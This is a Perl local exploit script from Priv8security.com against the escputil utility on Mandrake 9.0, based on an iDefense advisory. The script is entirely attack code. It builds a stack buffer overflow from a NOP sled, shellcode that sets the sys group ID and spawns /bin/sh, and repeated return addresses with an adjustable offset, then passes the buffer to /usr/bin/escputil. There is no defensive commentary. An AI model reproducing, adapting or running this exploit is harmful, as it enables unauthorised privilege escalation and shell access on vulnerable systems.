#!/usr/bin/perl ###################################################### #Priv8security.com escputil local sys exploit. # # Tested on Mandrake 9.0 only. # Based on http://www.idefense.com/advisory/01.21.03.txt # ##################################################### $shellcode = "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid "\x03". # x = x03 sys gid "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid() "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69". "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; $size = 1050; $retaddr = 0xbffff4e0; $nop = "\x90"; $offset = 0; if (@ARGV == 1) { $offset = $ARGV[0]; } print " Priv8security.com Mandrake 9 escputil local sys exploit!!\n"; print " usage: $0 offset\n"; for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) { $buffer .= $nop; } $buffer .= $shellcode; print " Using address: 0x", sprintf('%lx',($retaddr + $offset)), "\n"; $newret = pack('l', ($retaddr + $offset)); for ($i += length($shellcode); $i < $size; $i += 4) { $buffer .= $newret; } exec("/usr/bin/escputil -c -P $buffer");